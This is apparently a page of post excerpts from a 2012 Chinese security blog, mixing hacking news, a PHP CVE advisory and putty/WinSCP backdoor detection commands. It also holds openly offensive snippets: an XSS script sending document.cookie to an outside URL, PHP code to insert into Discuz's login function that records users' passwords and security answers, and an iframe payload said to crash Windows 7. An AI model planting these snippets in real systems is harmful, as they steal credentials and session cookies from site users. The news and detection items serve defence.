webshell杀毒工具

分类:工具 | 2012-02-4 | 撸过 855 次
0人扯谈

下载地址:HwsCloud

putty和WinSCP后门检查及清理方式

分类:技术 | 2012-02-4 | 撸过 689 次
0人扯谈

检查及清理方式

  检查/var/log 是否被删除# /usr/bin/stat /var/log
  如果被删除了,说明中招了
  查看/var/log 文件夹内容# ls -al /var/log
  如果文件很少,说明中招了
  监控名称为fsyslog,osysllog 的进程# /usr/bin/watch -n 1 /bin/ps -AFZ f | /bin/grep syslog
  如果有名称为fsyslog或osyslog的进程,说明中招了,注意不要和正常的系统日志进程混淆
  检查/etc/init.d/sshd 的文件头是否被篡改过# /usr/bin/head /e[......]

继续阅读

公司老总雇黑客报复对方网站被诉

分类:新闻 | 2012-02-4 | 撸过 675 次
0人扯谈

公司网站频频受到黑客攻击,婚恋公司法人代表乐某怀疑是竞争对手所为,于是便雇佣黑客攻击对方网站。近日,朝阳区人民检察院对恶意网络攻击竞争对手的乐某等4人以破坏计算机信息系统罪提起公诉。

乐某是北京某婚恋公司法定代表人,由于公司网站屡遭黑客攻击,乐某就怀疑是竞争对手——本案的被害公司所为,2010年底,乐某找到公司网络总监赵某想让其攻击竞争对手的网站。

赵某通过一搜索引擎提示的相关信息找到黑客李某和霍某某,商定以每小时200至500元的价格对竞争对手的网站进行攻击。

2011年2月至3月间,李某和霍某某频频在网站访问高峰时间以DDOS方式对被攻击网站的服务器进行攻击,造成网站瘫痪,给该公司的[......]

继续阅读

根服务器管理公司承认在2010年被黑客入侵过

分类:新闻 | 2012-02-4 | 撸过 768 次
0人扯谈

管理两台DNS域名根服务器和发行SSL证书的Verisign公司承认它在2010年曾被黑客入侵,但不知道有什么数据被盗取,称它不认为根服务器受到影响,但也不能排除它没受影响。

Verisign还承认,该公司的安全团队没有立即将入侵事件通知管理层,前CTO Ken Silva说他直到现在才听说有黑客入侵。在2010年收购Verisign证书发行业务的赛门铁克表示,没有证据表明系统受到影响。

PHP 5.3.9 重大漏洞 多语言拒绝服务漏洞事件预警

分类:新闻 | 2012-02-4 | 撸过 881 次
0人扯谈

安全部门监测到目前PHP 5.3.9被黑客发现存在严重的安全漏洞,远程攻击者可以直接利用此漏洞执行任意PHP代码,安全风险非常高。经过跟进,该漏洞(CVE-2012-0830)是由于PHP官方为解决多语言hash漏洞引入了新的机制产生的新的安全漏洞。

【漏洞影响版本】

PHP5.3.9

注:在修复PHP多语言hash漏洞时若采用直接打补丁的方式(补丁地址:点击查看)不受此漏洞影响。

【修复方案】

目前PHP官方已经紧急发布了5.3.10,下载地址为点击进入 ,请所有使用PHP 5.3.9版本的机器负责人尽快更新到PHP 5.3.10,建议更新前先进行测试。

之前还没有完成PHP多语[......]

继续阅读

简单的HTML代码弄死Windows 7

分类:新闻 | 2012-02-4 | 撸过 951 次
1人扯谈

这个很小的 iframe 标签(当然了,实际上它运行起来并不小)是一个强大到足以让一个64位的Win7系统崩溃的标签,它将导致 Win7 发生著名的蓝屏错误 Blue Screen Of Death (BSoD). 该漏洞是由 w3bd3vil报告的。该漏洞在64位的Win7下的Safari 浏览器测试中招,我很讨厌蓝屏,因此没有测试其他浏览器。微软正在进一步验证该漏洞,下面是关于该漏洞的一些技术细节:

<iframe height='18082563'></iframe>

注意:请为自己的测试负责.

描述:

该漏洞是由于 win32k.sys 的一个错误导[......]

继续阅读

跨站提取cookie的原理

分类:安全 | 2012-02-3 | 撸过 1,156 次
1人扯谈

个人理解为跨站就意味着可以执行javascript代码,javascript利用Document文档对象的cookie属性就获取到了cookie,然后就可能利用cookie欺骗登陆。

跨站提取cookie的原理 等价于
如何从在浏览器中获取cookie + 发送cookie到指定url

比如:

<script>document.write('<img src="https://www.webshell.cc/test.php?cookie='+document.cookie+'" width=0 height=0 border=0 />');</script&[......]

继续阅读

Discuz 密码记录

分类:安全 | 2012-02-3 | 撸过 1,097 次
0人扯谈
//打开source/function/function_member.php

//找到function userlogin

//在return $return;前面加上

$a=file_get_contents(dirname(__FILE__).’/1.txt’);

file_put_contents(dirname(__FILE__).’/1.txt’),$a.”Id:”.$username.”—-Psw:”.$password.”—-question:”.$questionid.”—-Answer:”.$answer.”\r\n”);

//记录登陆成功的账号密码以及问题答案![......]

继续阅读

putty和WinSCP后门检查及清理方式

分类:技术 | 2012-02-3 | 撸过 777 次
0人扯谈

检查及清理方式

  检查/var/log 是否被删除# /usr/bin/stat /var/log
  如果被删除了,说明中招了
  查看/var/log 文件夹内容# ls -al /var/log
  如果文件很少,说明中招了
  监控名称为fsyslog,osysllog 的进程# /usr/bin/watch -n 1 /bin/ps -AFZ f \| /bin/grep syslog
  如果有名称为fsyslog或osyslog的进程,说明中招了,注意不要和正常的系统日志进程混淆
  检查/etc/init.d/sshd 的文件头是否被篡改过# /usr/bin/head /[......]

继续阅读

创宇安全研究团队:中文版putty后门事件分析

分类:新闻 | 2012-02-1 | 撸过 794 次
1人扯谈

近几日,中文版putty等SSH远程管理工具被曝出存在后门,该后门会自动
窃取管理员所输入的SSH用户名与口令,并将其发送至指定服务器上。知道创宇安全研究小组在第一时间获取该消息后,对此次事件进行了跟踪和分析。根据分
析,此次事件涉及到来自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站点的中文版putty、
WinSCP、SSHSecure和psftp等软件,而这些软件的英文版本不受影响。

1.时间线

1月25日:新浪微博有网友发布消息称putty和winscp中装有后门程序,但该条微博并未提及后门程序的类型及其技术细节,而且消息也未被过多的人[......]

继续阅读

第 30 页,共 70 页« 最新...1020...2829303132...405060...最旧 »